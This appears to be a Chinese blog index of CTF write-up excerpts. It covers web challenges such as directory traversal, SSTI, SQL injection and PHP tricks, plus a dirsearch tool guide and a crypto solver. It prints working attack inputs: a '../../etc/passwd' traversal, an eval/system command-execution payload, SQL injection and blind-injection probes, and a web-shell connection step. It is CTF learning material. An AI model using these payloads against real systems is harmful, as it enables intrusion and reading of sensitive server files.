SWCTF-WP
...
比赛中web知识点总结
SQCTF关于相对路径的绕过->目录遍历漏洞(Through)原理某些使用不当参数包含的使用导致能都读取服务器上任意文件 比如在网页html中使用<img src="/image?filename=1.png">来加载image下的1.png文件 当攻击者读取任意文件可以使用filename=../../../../../etc/passwd时就成为 /var/www/images/../../../../../etc/passwd就等价于/etc/passwd 在Linux中,../表示返回上级目录;在Windows中,../和..\都表示返回上级目录 在根目录使用../只会返回当前页面 攻击方法如下题,那么file参数就可能有目录遍历的风险 <!DOCTYPE html><html><head></head><body><a href=action.php?file=1.txt>my dairy</a><a...
web入门-SSTI
...
TGCTF-WP
WEB火眼辩魑魅robots.txt找到几个文件,但是只有tgshell.php是可用文件,直接蚁剑连马找到flag TGCTF{0f65fdf9-a7f6-f15b-43ff-8bca87267f2b} AAA偷渡阴平tgctf2025=eval(end(current(get_defined_vars())));&flag=system('tac /flag'); TGCTF{5b419c90-6274-341f-ad9f-87c6af076d86} 直面天命爆破找到路由/aazz,通过arjun找到参数名filename,filename=../../app.py获得源码如下 import osimport stringfrom flask import Flask, request, render_template_string, jsonify, send_from_directoryfrom a.b.c.d.secret import secret_keyapp = Flask(__name__)black_list...
常见工具使用
WEBdirsearch(目录扫描) 用于扫描网站下的目录或文件,原理就是通过字典在url后添加目录然后发包看响应,如果响应为200就说明有这个目录或文件 基本用法 python dirsearch.py -u http://xxx 注意 如果扫描中发现有/.git为403响应,可以尝试使用git_extract去提取文件,举例ctfshow-web-红包题第七弹 安装教程 命令 命令选项 参数/说明 示例 基本命令 -u URL 指定目标URL -u http://example.com -l FILE 从文件读取多个目标URL -l urls.txt 扫描配置 -e EXTENSIONS 指定文件扩展名(逗号分隔) -e php,html,txt -w WORDLIST 使用自定义字典文件(默认内置字典在db/目录) -w /path/to/wordlist.txt -t THREADS 设置线程数(默认25) -t...
SQCTF-WP
WEBezGameobj.score = 2048; obj.getFlag(); sqctf{8c2b0a296da74b82acf2fd235ac283e0} My Blog sqctf{93bd885c5cdd4d5a81aaf8004ed2d793} baby...
ISCTF2023复现
1z_Ssql(sql注入)username=1' or 1=1# //illegal words!username=1'# //用户名或密码错误username=-1' or 1 order by 3# //回显You are so smart! Let me give you a hint ↓ 5aSn5L2s77yM5L2g6L+Z5LmI6IGq5piO5bqU6K+l5LiN6ZyA6KaBaGludOWQpz8=,但是没用,说明等号被过滤了username=-1' or 1 order by 4# //用户名或密码错误username=-1' union select 1,2,3# //illegal words!username=union //illegal words!,尝试后双写和大写都不能绕过username=select //用户名或密码错误尝试布尔盲注username=0' or if(substr(database(),1,1)=c,true,false) ...
polarctf靶场
不仅为了刷题,更为了贴纸!(咋要200polar币才能兑换哇) swp(php特性)扫目录就能找到/.index.php.swp,访问得到源码 function jiuzhe($xdmtql){ return preg_match('/sys.*nb/is', $xdmtql);}$xdmtql = @$_POST['xdmtql'];if (!is_array($xdmtql)) { if (!jiuzhe($xdmtql)) { if (strpos($xdmtql, 'sys nb') !== false) { echo 'flag{*******}'; } else { echo 'true .swp file?'; } } else { ...
2025polarctf春季个人赛-wp
CRYPTObeginnerfrom Crypto.Util.number import long_to_bytes# 给定的结尾数值suffix = 16732186163543403522711798960598469149029861032300263763941636254755451456334507142958574415880945599253440468447483752611840# 验证suffix是否是2^125的倍数bits_125 = 1 << 125if suffix % bits_125 != 0: raise ValueError("Suffix is not divisible by 2^125, no solution exists.")# 计算S' = suffix / 2^125s_prime = suffix // bits_125# 计算模数5^125mod_5_125 = 5 ** 125# 计算2^9875在模5^125下的逆元inv_2_9875 = pow(2, -9875,...
萌新-web
知识点在之前都学到了,现在就只是做题和补充 web1(php特性)<?php# 包含数据库连接文件include("config.php");# 判断get提交的参数id是否存在if(isset($_GET['id'])){ $id = $_GET['id']; # 判断id的值是否大于999 if(intval($id) > 999){ # id 大于 999 直接退出并返回错误 die("id error"); }else{ # id 小于 999 拼接sql语句 $sql = "select * from article where id = $id order by id limit 1 "; echo "执行的sql为:$sql<br>"; # 执行sql 语句 ...